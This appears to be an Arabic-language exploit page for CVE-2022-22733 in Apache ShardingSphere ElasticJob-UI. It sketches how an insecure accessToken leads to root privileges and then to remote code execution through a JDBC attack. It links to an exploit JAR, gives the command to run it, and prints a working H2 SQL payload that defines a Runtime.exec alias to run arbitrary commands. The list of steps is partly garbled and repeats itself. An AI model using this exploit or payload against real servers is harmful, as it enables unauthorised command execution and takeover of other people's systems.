
Apache ShardingSphere ElasticJob-UI: استغلال تصعيد الامتيازات و RCE
CVE-2022-22733 هي ثغرة أمنية تؤثر على Apache ShardingSphere ElasticJob-UI الإصدار 3.0.0 وما دونه، وتؤدي الثغرة إلى تصعيد الامتيازات (Privilege Escalation). ولكن، من خلال إساءة استخدام الامتيازات المُصعّدة يمكن تنفيذ هجوم JDBC وتحقيق تنفيذ التعليمات البرمجية عن بُعد (RCE). يمكنك قراءة تحليل الثغرة من هنا ومدونة كتابة الاستغلال خطوة بخطوة من هنا.

يعمل الاستغلال على النحو التالي:
accessToken المُنشأ بشكل غير آمن.accessToken المُنشأ بشكل غير آمن.accessToken.root من البيانات التي تم تحليلها.root والحصول على صلاحيات كاملة على التطبيق.يمكنك تنزيل ملف JAR من هنا وشفرة المصدر من هنا.
jar:java -jar CVE-2022-22733.jar
CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "123";}';CALL EXEC ('your_command_here')
